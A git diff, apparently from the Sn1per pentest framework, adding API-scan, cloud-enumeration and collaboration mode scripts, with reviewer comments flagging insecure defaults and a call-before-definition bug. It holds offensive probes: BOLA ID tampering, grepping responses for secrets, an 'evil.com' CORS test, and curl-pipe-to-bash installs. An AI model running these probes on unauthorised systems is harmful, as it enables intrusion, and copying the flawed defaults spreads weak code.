+ENABLE_GOVERNANCE="1"
+GOVERNANCE_FRAMEWORK="" # Options: itil, cobit, iso27001, nist-csf
+GOVERNANCE_POLICIES="" # Path to governance policies
+
+# Container Security Continuous Improvement
+ENABLE_CONTINUOUS_IMPROVEMENT="1"
+IMPROVEMENT_METRICS="" # Comma-separated list of metrics to track
+IMPROVEMENT_GOALS="" # Comma-separated list of improvement goals
diff --git a/modes/airstrike.sh b/modes/airstrike.sh
old mode 100644
new mode 100755
diff --git a/modes/api-security-scan.sh b/modes/api-security-scan.sh
new file mode 100644
index 00000000..31dc9161
--- /dev/null
+++ b/modes/api-security-scan.sh
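Review bot: `ENABLE_API="1"` together with `API_PORT="8080"`, `API_AUTHENTICATION="1"` and an empty `API_AUTHENTICATION_TOKEN` makes the shipped default a listening API with no credential to check; what the consumer does with an empty token is not visible here, so either default `ENABLE_API="0"` or have the consumer refuse to start the API while the token is empty. `DOCKER_TLS_VERIFY="0"` is the default even though `DOCKER_SOCKET` is user-settable, so the moment someone points it at a `tcp://` daemon certificate verification is already off — default it to `"1"` and note in a comment that it is irrelevant for the unix socket. `USE_CLAIRE="1"` alongside `USE_CLAIR="1"` looks like a misspelt duplicate, and `MONITOR_CONTAINER_RUNTIME`, `SCAN_KUBERNETES_NETWORK_POLICIES` and `SCAN_KUBERNETES_INGRESS` are each assigned more than once in this file, so only the last assignment takes effect. `CSPM_FRAMEWORKS="cis, nist, pci"` and `COMPLIANCE_STANDARDS="cis, nist, pci, gdpr, hipaa"` carry a space after each comma, unlike every other comma-separated list in these configs, so a plain `IFS=,` split yields ` nist`; drop the spaces.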
@@ -0,0 +1,327 @@
+#!/bin/bash
+# API Security Scan Mode
+# Author: Sn1per Security Team
+# Description: Comprehensive API security testing and assessment
+
+if [[ "$API_SECURITY_SCAN" = "1" ]]; then
+ echo "[sn1persecurity.com] •?((¯°·._.• Started API Security Scan: $TARGET [api-security-scan] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
+
+ if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
+ /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started API Security Scan: $TARGET [api-security-scan] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
+ fi
+
+ mkdir -p $LOOT_DIR/api/$TARGET
+
+ # Check if the target is a URL
+ if [[ ! $TARGET =~ ^https?:// ]]; then
+ TARGET="http://$TARGET"
+ fi
+
+ # API Discovery
+ echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
+ echo -e "$OKRED DISCOVERING API ENDPOINTS $RESET"
+ echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
+
+ # Use common API endpoints discovery
+ if command -v gau &> /dev/null; then
+ echo -e "${OKBLUE}[*]${RESET} Discovering API endpoints with gau..."
+ echo $TARGET | gau --subs --threads 10 | grep -iE "\.(json|xml|api|rest|soap|graphql|grpc|rpc)" | sort -u > $LOOT_DIR/api/$TARGET/endpoints-gau.txt
+ fi
+
+ if command -v waybackurls &> /dev/null; then
+ echo -e "${OKBLUE}[*]${RESET} Discovering historical API endpoints with waybackurls..."
+ echo $TARGET | waybackurls | grep -iE "\.(json|xml|api|rest|soap|graphql|grpc|rpc)" | sort -u > $LOOT_DIR/api/$TARGET/endpoints-wayback.txt
+ fi
+
+ # Combine and deduplicate endpoints
+ cat $LOOT_DIR/api/$TARGET/endpoints-*.txt 2>/dev/null | sort -u > $LOOT_DIR/api/$TARGET/endpoints-all.txt
+
+ # API Documentation Discovery
+ echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
+ echo -e "$OKRED SEARCHING FOR API DOCUMENTATION $RESET"
+ echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
+
+ # Common API documentation paths
+ DOC_PATHS=("/api/docs" "/swagger" "/swagger-ui" "/swagger-ui.html" "/api/swagger" "/api-docs"
+"/api-docs/swagger.json" "/v1/api-docs" "/v2/api-docs" "/v3/api-docs" "/openapi"
+"/openapi.json" "/openapi.yaml" "/openapi.yml" "/api/openapi.json" "/documentation")
+
+ for path in "${DOC_PATHS[@]}"; do
+ url="${TARGET%/}$path"
+ echo -e "${OKBLUE}[*]${RESET} Checking: $url"
+ curl -s -k -L --connect-timeout 5 --max-time 10 -o /dev/null -w "%{http_code}" "$url" | grep -q "^[23]" && echo "[+] Found: $url" >> $LOOT_DIR/api/$TARGET/api-docs-found.txt
+ done
+
+ # API Security Testing
+ echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
+ echo -e "$OKRED PERFORMING API SECURITY TESTS $RESET"
+ echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
+
+ # Run OWASP ZAP if available
+ if [[ "$ZAP_SCAN" = "1" ]] && command -v zap-cli &> /dev/null; then
+ echo -e "${OKBLUE}[*]${RESET} Running OWASP ZAP API scan..."
+ zap-cli start --start-options '-config api.disablekey=true' > /dev/null 2>&1 &
+ ZAP_PID=$!
+ sleep 10
+
+ zap-cli open-url "$TARGET"
+ zap-cli active-scan "$TARGET"
+ zap-cli report -o "$LOOT_DIR/api/$TARGET/zap-report.html" -f html
+
+ kill $ZAP_PID
+ fi
+
+ # Run Nuclei for API security checks
+ if command -v nuclei &> /dev/null; then
+ echo -e "${OKBLUE}[*]${RESET} Running Nuclei API security checks..."
+ nuclei -t "$NUCLEI_TEMPLATES_PATH/technologies/" -t "$NUCLEI_TEMPLATES_PATH/vulnerabilities/" -u "$TARGET" -o "$LOOT_DIR/api/$TARGET/nuclei-api-scan.txt" -silent
+ fi
+
+ # Test for common API vulnerabilities
+ echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
+ echo -e "$OKRED TESTING FOR COMMON API VULNERABILITIES $RESET"
+ echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
+
+ # Test for BOLA (Broken Object Level Authorization)
+ echo -e "${OKBLUE}[*]${RESET} Testing for BOLA (Broken Object Level Authorization)..."
+ if [ -s "$LOOT_DIR/api/$TARGET/endpoints-all.txt" ]; then
+ for endpoint in $(grep -E "/[0-9]+/" $LOOT_DIR/api/$TARGET/endpoints-all.txt | head -n 10); do
+ # Try to access another user's resource by ID manipulation
+ new_id=$(($(echo $endpoint | grep -oE '[0-9]+' | head -n 1) + 1))
+ test_url=$(echo $endpoint | sed -E "s|/[0-9]+/|/$new_id/|g")
+ status_code=$(curl -s -k -o /dev/null -w "%{http_code}" -H "Authorization: Bearer $API_TOKEN" "$test_url")
+
+ if [[ "$status_code" == "200" ]]; then
+ echo "[!] Possible BOLA vulnerability found: $test_url" >> "$LOOT_DIR/api/$TARGET/vulnerabilities-bola.txt"
+ fi
+ done
+ fi
+
+ # Test for Excessive Data Exposure
+ echo -e "${OKBLUE}[*]${RESET} Testing for Excessive Data Exposure..."
+ if [ -s "$LOOT_DIR/api/$TARGET/endpoints-all.txt" ]; then
+ for endpoint in $(grep -E "\.(json|xml)" $LOOT_DIR/api/$TARGET/endpoints-all.txt | head -n 10); do
+ # Check if sensitive data is exposed in the response
+ response=$(curl -s -k -H "Authorization: Bearer $API_TOKEN" "$endpoint")
+
+ if echo "$response" | grep -qE '(password|token|secret|key|auth|credential)'; then
+ echo "[!] Possible Excessive Data Exposure in: $endpoint" >> "$LOOT_DIR/api/$TARGET/vulnerabilities-data-exposure.txt"
+ echo " Exposed sensitive data: $(echo "$response" | grep -Eo '(password|token|secret|key|auth|credential)[^,\"\'\}]*' | head -n 3 | tr '\n' ',')" >> "$LOOT_DIR/api/$TARGET/vulnerabilities-data-exposure.txt"
+ fi
+ done
+ fi
+
+ # Test for Security Misconfiguration
+ echo -e "${OKBLUE}[*]${RESET} Testing for Security Misconfigurations..."
+ # Check for missing security headers
+ curl -s -k -I "$TARGET" | grep -iE "(server|x-powered-by|x-aspnet-version|x-aspnetmvc-version)" > "$LOOT_DIR/api/$TARGET/security-headers.txt"
+
+ # Check for CORS misconfigurations
+ echo -e "${OKBLUE}[*]${RESET} Testing CORS Misconfigurations..."
+ curl -s -k -I -H "Origin: https://evil.com" -H "Access-Control-Request-Method: GET" "$TARGET" | grep -i "access-control" > "$LOOT_DIR/api/$TARGET/cors-test.txt" + + # Generate API Security Report + generate_api_security_report "$TARGET" + + echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED API SECURITY SCAN COMPLETE $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + echo "[sn1persecurity.com] •?((¯°·._.• Finished API Security Scan: $TARGET [api-security-scan] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt + + if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished API Security Scan: $TARGET [api-security-scan] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi +fi + +# Generate API Security Report +generate_api_security_report() { + local target=$1 + local report_file="$LOOT_DIR/api/$target/api-security-report-$(date +%Y%m%d%H%M).html" + + # Count findings + local total_findings=0 + local critical_findings=$(wc -l < "$LOOT_DIR/api/$target/vulnerabilities-bola.txt" 2>/dev/null) + local exposure_findings=$(wc -l < "$LOOT_DIR/api/$target/vulnerabilities-data-exposure.txt" 2>/dev/null) + total_findings=$((total_findings + critical_findings + exposure_findings)) + + cat > "$report_file" << EOL + + + + API Security Assessment Report - $target + + + +
+

API Security Assessment Report

+

Target: $target | Generated: $(date)

+
+ +
+

Executive Summary

+
+ Total Findings: + $total_findings +
+
+ Critical Findings: + $critical_findings +
+
+ Data Exposure Issues: + $exposure_findings +
+
+ API Endpoints Discovered: + $(wc -l < "$LOOT_DIR/api/$target/endpoints-all.txt" 2>/dev/null || echo "0") +
+
+ +
+

Critical Findings

+ +
+

Broken Object Level Authorization (BOLA)

+ $(if [ -s "$LOOT_DIR/api/$target/vulnerabilities-bola.txt" ]; then + echo "

The following endpoints may be vulnerable to BOLA attacks:

" + echo "
"
+                cat "$LOOT_DIR/api/$target/vulnerabilities-bola.txt"
+                echo "
" + echo "

Remediation: Implement proper authorization checks to ensure users can only access resources they are authorized to access.

" + else + echo "

No BOLA vulnerabilities were identified during testing.

" + fi) +
+ +
+

Excessive Data Exposure

+ $(if [ -s "$LOOT_DIR/api/$target/vulnerabilities-data-exposure.txt" ]; then + echo "

The following endpoints may be exposing sensitive data:

" + echo "
"
+                cat "$LOOT_DIR/api/$target/vulnerabilities-data-exposure.txt"
+                echo "
" + echo "

Remediation: Review and filter sensitive data in API responses. Only return the minimum required data for each endpoint.

" + else + echo "

No excessive data exposure issues were identified during testing.

" + fi) +
+
+ +
+

API Endpoints Discovered

+ $(if [ -s "$LOOT_DIR/api/$target/endpoints-all.txt" ]; then + echo "

Total endpoints discovered: $(wc -l < "$LOOT_DIR/api/$target/endpoints-all.txt")

" + echo "
" + echo "
"
+            head -n 50 "$LOOT_DIR/api/$target/endpoints-all.txt"
+            [ $(wc -l < "$LOOT_DIR/api/$target/endpoints-all.txt") -gt 50 ] && echo "\n... and more (truncated)"
+            echo "
" + echo "
" + echo "

Full list available at: $LOOT_DIR/api/$target/endpoints-all.txt

" + else + echo "

No API endpoints were discovered during testing.

" + fi) +
+ +
+

Security Headers

+ $(if [ -s "$LOOT_DIR/api/$target/security-headers.txt" ]; then + echo "

The following security-related headers were identified:

" + echo "
"
+            cat "$LOOT_DIR/api/$target/security-headers.txt"
+            echo "
" + echo "

Recommendation: Ensure proper security headers are implemented (e.g., Content-Security-Policy, X-Content-Type-Options, X-Frame-Options, etc.).

" + else + echo "

No security headers were identified in the response.

" + fi) +
+ +
+

Recommendations

+
+

General Security Recommendations

+
    +
  • Implement proper authentication and authorization for all API endpoints
  • +
  • Use HTTPS for all API communications
  • +
  • Implement rate limiting to prevent abuse
  • +
  • Validate and sanitize all input data
  • +
  • Implement proper error handling that doesn't leak sensitive information
  • +
  • Regularly update and patch all API dependencies
  • +
  • Implement proper logging and monitoring
  • +
  • Conduct regular security assessments and penetration tests
  • +
+
+
+ +
+ Report generated by Sn1per Professional v$VERSION on $(date) +
+ + +EOL + + echo -e "${OKGREEN}[*]${RESET} API security report generated: $report_file" +} diff --git a/modes/bruteforce.sh b/modes/bruteforce.sh old mode 100644 new mode 100755 diff --git a/modes/cloud-asset-discovery.sh b/modes/cloud-asset-discovery.sh new file mode 100644 index 00000000..1ea85abd --- /dev/null +++ b/modes/cloud-asset-discovery.sh 
@@ -0,0 +1,212 @@ +#!/bin/bash +# Cloud Asset Discovery Mode +# Author: Sn1per Security Team +# Description: Discovers and enumerates cloud assets across multiple providers + +if [[ "$CLOUD_DISCOVERY" = "1" ]]; then + echo "[sn1persecurity.com] •?((¯°·._.• Started Cloud Asset Discovery: $TARGET [cloud-asset-discovery] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt + + if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Cloud Asset Discovery: $TARGET [cloud-asset-discovery] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + + mkdir -p $LOOT_DIR/cloud/$TARGET + + # AWS Discovery + if [[ "$AWS_DISCOVERY" = "1" ]]; then + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED DISCOVERING AWS ASSETS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + # Check for AWS CLI and install if not present + if ! command -v aws &> /dev/null; then + echo -e "$OKORANGE[i]$RESET AWS CLI not found. Installing..." + pip3 install awscli --upgrade --user + export PATH=~/.local/bin:$PATH + fi + + # Run AWS recon if credentials are configured + if aws sts get-caller-identity &> /dev/null; then + # List all regions + for region in $(aws ec2 describe-regions --query "Regions[].RegionName" --output text); do + echo -e "${OKBLUE}[*]${RESET} Scanning AWS region: $region" + + # EC2 Instances + echo -e "${OKBLUE}[*]${RESET} Enumerating EC2 instances..." 
+ aws ec2 describe-instances --region $region --query 'Reservations[*].Instances[*].[InstanceId,InstanceType,PrivateIpAddress,PublicIpAddress,State.Name,Tags[?Key==`Name`].Value|[0]]' --output table > $LOOT_DIR/cloud/$TARGET/aws-ec2-$region.txt 2>&1 + + # S3 Buckets + echo -e "${OKBLUE}[*]${RESET} Enumerating S3 buckets..." + aws s3 ls --region $region > $LOOT_DIR/cloud/$TARGET/aws-s3-$region.txt 2>&1 + + # IAM Users and Policies + echo -e "${OKBLUE}[*]${RESET} Enumerating IAM users and policies..." + aws iam list-users > $LOOT_DIR/cloud/$TARGET/aws-iam-users.json 2>&1 + aws iam list-policies --scope Local --output json > $LOOT_DIR/cloud/$TARGET/aws-iam-policies.json 2>&1 + + # Lambda Functions + echo -e "${OKBLUE}[*]${RESET} Enumerating Lambda functions..." + aws lambda list-functions --region $region > $LOOT_DIR/cloud/$TARGET/aws-lambda-$region.json 2>&1 + done + else + echo -e "${OKORANGE}[!]${RESET} AWS CLI not configured. Skipping AWS discovery." + fi + fi + + # Azure Discovery + if [[ "$AZURE_DISCOVERY" = "1" ]]; then + echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED DISCOVERING AZURE ASSETS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + if command -v az &> /dev/null; then + if az account show &> /dev/null; then + # List all subscriptions + for sub in $(az account list --query "[].id" -o tsv); do + echo -e "${OKBLUE}[*]${RESET} Scanning Azure subscription: $sub" + + # Set subscription + az account set --subscription $sub + + # List VMs + echo -e "${OKBLUE}[*]${RESET} Enumerating virtual machines..." + az vm list --output table > $LOOT_DIR/cloud/$TARGET/azure-vms-$sub.txt 2>&1 + + # List Storage Accounts + echo -e "${OKBLUE}[*]${RESET} Enumerating storage accounts..." 
+ az storage account list --output table > $LOOT_DIR/cloud/$TARGET/azure-storage-$sub.txt 2>&1 + + # List App Services + echo -e "${OKBLUE}[*]${RESET} Enumerating app services..." + az webapp list --output table > $LOOT_DIR/cloud/$TARGET/azure-webapps-$sub.txt 2>&1 + done + else + echo -e "${OKORANGE}[!]${RESET} Azure CLI not logged in. Skipping Azure discovery." + fi + else + echo -e "${OKORANGE}[!]${RESET} Azure CLI not found. Install with: curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash" + fi + fi + + # GCP Discovery + if [[ "$GCP_DISCOVERY" = "1" ]]; then + echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED DISCOVERING GCP ASSETS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + if command -v gcloud &> /dev/null; then + # List all projects + for project in $(gcloud projects list --format="value(projectId)"); do + echo -e "${OKBLUE}[*]${RESET} Scanning GCP project: $project" + + # Set project + gcloud config set project $project + + # List Compute Instances + echo -e "${OKBLUE}[*]${RESET} Enumerating compute instances..." + gcloud compute instances list > $LOOT_DIR/cloud/$TARGET/gcp-compute-$project.txt 2>&1 + + # List Storage Buckets + echo -e "${OKBLUE}[*]${RESET} Enumerating storage buckets..." + gsutil ls -p $project > $LOOT_DIR/cloud/$TARGET/gcp-storage-$project.txt 2>&1 + + # List Cloud Functions + echo -e "${OKBLUE}[*]${RESET} Enumerating cloud functions..." + gcloud functions list > $LOOT_DIR/cloud/$TARGET/gcp-functions-$project.txt 2>&1 + done + else + echo -e "${OKORANGE}[!]${RESET} Google Cloud SDK not found. 
Install with: curl https://sdk.cloud.google.com | bash" + fi + fi + + echo -e "\n${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED CLOUD ASSET DISCOVERY COMPLETE $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + # Generate report + if [[ "$GENERATE_REPORT" = "1" ]]; then + generate_cloud_report "$TARGET" + fi + + echo "[sn1persecurity.com] •?((¯°·._.• Finished Cloud Asset Discovery: $TARGET [cloud-asset-discovery] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt + + if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Cloud Asset Discovery: $TARGET [cloud-asset-discovery] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi +fi + +# Generate cloud discovery report +generate_cloud_report() { + local target=$1 + local report_file="$LOOT_DIR/cloud/$target/cloud-asset-report-$(date +%Y%m%d%H%M).html" + + cat > "$report_file" << EOL + + + + Cloud Asset Discovery Report - $target + + + +
+

Cloud Asset Discovery Report

+

Target: $target | Generated: $(date)

+
+ +
+

Summary

+

Cloud asset discovery performed on $(date) against target $target.

+
+ +
+

Assets Discovered

+
+

AWS Assets

+
$(cat $LOOT_DIR/cloud/$target/aws-ec2-*.txt 2>/dev/null || echo "No AWS assets found")
+
+ +
+

Azure Assets

+
$(cat $LOOT_DIR/cloud/$target/azure-vms-*.txt 2>/dev/null || echo "No Azure assets found")
+
+ +
+

GCP Assets

+
$(cat $LOOT_DIR/cloud/$target/gcp-compute-*.txt 2>/dev/null || echo "No GCP assets found")
+
+
+ +
+

Recommendations

+
+

Security Recommendations

+
    +
  • Review and restrict IAM permissions following the principle of least privilege
  • +
  • Enable logging and monitoring for all cloud resources
  • +
  • Regularly audit and rotate access keys and credentials
  • +
  • Implement network segmentation and security groups
  • +
  • Enable multi-factor authentication for all privileged accounts
  • +
+
+
+ +
+ Report generated by Sn1per Professional v$VERSION on $(date) +
+ + +EOL + + echo -e "${OKGREEN}[*]${RESET} Cloud asset discovery report generated: $report_file" +}
diff --git a/modes/collaboration.sh b/modes/collaboration.sh
new file mode 100644
index 00000000..f41c4633
--- /dev/null
+++ b/modes/collaboration.sh
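Review bot: `generate_cloud_report` is invoked inside the `if [[ "$CLOUD_DISCOVERY" = "1" ]]` block (`generate_cloud_report "$TARGET"` under the `GENERATE_REPORT` check) but its definition only follows that block, so bash reaches the call before the function exists and fails with "command not found"; move the `generate_cloud_report() { … }` definition above the `if`. The report also embeds `$target` and the raw contents of `aws-ec2-*.txt`, `azure-vms-*.txt` and `gcp-compute-*.txt` into HTML without escaping, and the EC2 query includes the `Name` tag value, which is free text set by whoever administers the account, so any markup in a resource name is rendered verbatim when the report is opened — filter each `$(cat …)` through `sed 's/&/\&amp;/g; s/</\&lt;/g; s/>/\&gt;/g'` before embedding. `aws iam list-users` and `aws iam list-policies` are account-wide calls issued once per region inside the loop, overwriting the same two files on every iteration; hoisting them above `for region in …` removes the redundant requests. Because `2>&1` sends stderr into the loot files, CLI error text (for example from a region the credentials cannot query) ends up in the report as if it were asset data; consider directing stderr to a separate `.err` file per provider.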
@@ -0,0 +1,866 @@ +#!/bin/bash +# REAL-TIME COLLABORATION FEATURES MODULE ##################################################################################################### +# Advanced real-time collaboration, team coordination, and communication features for Sn1per + +if [[ "$REPORT" = "1" ]]; then + args="-t $TARGET" + if [[ "$OSINT" = "1" ]]; then + args="$args -o" + fi + if [[ "$AUTO_BRUTE" = "1" ]]; then + args="$args -b" + fi + if [[ "$FULLNMAPSCAN" = "1" ]]; then + args="$args -fp" + fi + if [[ "$RECON" = "1" ]]; then + args="$args -re" + fi + if [[ "$MODE" = "collab" ]]; then + args="$args -m collab" + fi + if [[ ! -z "$PORT" ]]; then + args="$args -p $PORT" + fi + if [[ ! -z "$WORKSPACE" ]]; then + args="$args -w $WORKSPACE" + fi + args="$args --noreport" + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-`date +"%Y%m%d%H%M"`.txt 2>&1 + exit +fi + +echo -e "$OKRED ____ $RESET" +echo -e "$OKRED _________ / _/___ ___ _____$RESET" +echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" +echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" +echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" +echo -e "$OKRED /_/ $RESET" +echo -e "$RESET" +echo -e "$OKORANGE + -- --=[https://sn1persecurity.com" +echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz" +echo -e "$OKORANGE + -- --=[Real-Time Collaboration Mode - Team Coordination & Communication" +echo -e "$RESET" + +if [[ ! 
-z $WORKSPACE ]]; then + LOOT_DIR=$WORKSPACE_DIR +fi + +echo "$TARGET" >> $LOOT_DIR/domains/targets.txt +if [[ "$MODE" = "" ]]; then + MODE="collaboration" + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2>/dev/null +else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2>/dev/null +fi +echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/${TARGET}-${MODE}.txt 2>/dev/null +echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2>/dev/null +ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt + +echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per collaboration mode: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt +if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per collaboration mode: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" +fi + +# Initialize collaboration directories +mkdir -p $LOOT_DIR/collaboration/{team-chat,shared-workspace,progress-tracking,notification-center,report-sharing} 2>/dev/null + +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED INITIALIZING REAL-TIME COLLABORATION $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# 1. 
TEAM CHAT SYSTEM +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED TEAM CHAT SYSTEM $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +echo -e "$OKBLUE[*]$RESET Setting up team chat system..." + +# Create team chat script +cat > $LOOT_DIR/collaboration/team-chat/chat-server.sh << EOF +#!/bin/bash +# Sn1per Team Chat Server + +CHAT_LOG="$LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log" +CHAT_USERS="$LOOT_DIR/collaboration/team-chat/active-users.txt" + +echo "[*] Sn1per Team Chat Server Started" > "$CHAT_LOG" +echo "[*] Target: $TARGET" >> "$CHAT_LOG" +echo "[*] Time: $(date)" >> "$CHAT_LOG" + +# Function to add message to chat +add_message() { + echo "[$TARGET] [\$(whoami)] [\$(date '+%Y-%m-%d %H:%M:%S')] \$1" >> "$CHAT_LOG" + echo "[CHAT] \$1" +} + +# Function to show recent messages +show_recent() { + echo "=== Recent Chat Messages ===" + tail -20 "$CHAT_LOG" 2>/dev/null + echo "===========================" +} + +# Function to add user to active users +add_user() { + echo "\$(whoami) - \$(date '+%Y-%m-%d %H:%M:%S')" >> "$CHAT_USERS" +} + +# Add current user +add_user + +echo "[*] Type 'help' for available commands" +echo "[*] Type 'quit' to exit chat" + +while true; do + read -p "[$TARGET:\$(whoami)] " message + + case \$message in + "quit"|"exit") + echo "[*] Leaving chat..." 
+ break + ;; + "help") + echo "Available commands:" + echo " help - Show this help" + echo " users - Show active users" + echo " recent - Show recent messages" + echo " clear - Clear screen" + echo " status - Show scan status" + echo " findings - Show latest findings" + echo " quit - Exit chat" + ;; + "users") + echo "=== Active Users ===" + cat "$CHAT_USERS" 2>/dev/null + echo "===================" + ;; + "recent") + show_recent + ;; + "clear") + clear + ;; + "status") + echo "=== Scan Status ===" + ls -la $LOOT_DIR/scans/running_*.txt 2>/dev/null | wc -l + echo "running scans" + echo "==================" + ;; + "findings") + echo "=== Latest Findings ===" + find $LOOT_DIR -name "*.txt" -newermt "1 hour ago" 2>/dev/null | head -5 + echo "=======================" + ;; + "") + # Empty message, do nothing + ;; + *) + add_message "\$message" + ;; + esac +done +EOF +chmod +x $LOOT_DIR/collaboration/team-chat/chat-server.sh + +# 2. SHARED WORKSPACE SYSTEM +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED SHARED WORKSPACE SYSTEM $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +echo -e "$OKBLUE[*]$RESET Setting up shared workspace..." + +# Create workspace sharing script +cat > $LOOT_DIR/collaboration/shared-workspace/workspace-share.sh << EOF +#!/bin/bash +# Sn1per Workspace Sharing System + +WORKSPACE_DIR="$LOOT_DIR" +TARGET="$TARGET" + +echo "[*] Sn1per Workspace Sharing System" +echo "[*] Workspace: $WORKSPACE_DIR" +echo "[*] Target: $TARGET" + +# Function to share files with team +share_files() { + echo "[*] Sharing files with team members..." 
+ + # Create shared directory + SHARED_DIR="$WORKSPACE_DIR/shared" + mkdir -p "$SHARED_DIR" + + # Copy important findings to shared directory + cp $WORKSPACE_DIR/vuln-analysis/vulnerability-report-$TARGET.txt "$SHARED_DIR/" 2>/dev/null + cp $WORKSPACE_DIR/ml-analysis/ai-analysis-report-$TARGET.txt "$SHARED_DIR/" 2>/dev/null + cp $WORKSPACE_DIR/exploit-framework/exploit-report-$TARGET.txt "$SHARED_DIR/" 2>/dev/null + + echo "[+] Files shared to: $SHARED_DIR" + ls -la "$SHARED_DIR" +} + +# Function to sync with team +sync_with_team() { + echo "[*] Syncing with team workspace..." + + # Check for team updates + if [[ -f "$WORKSPACE_DIR/team-updates.txt" ]]; then + echo "=== Team Updates ===" + cat "$WORKSPACE_DIR/team-updates.txt" + echo "===================" + fi +} + +# Function to create team report +create_team_report() { + echo "[*] Creating team report..." + + REPORT_FILE="$WORKSPACE_DIR/collaboration/team-report-$TARGET.md" + + cat > 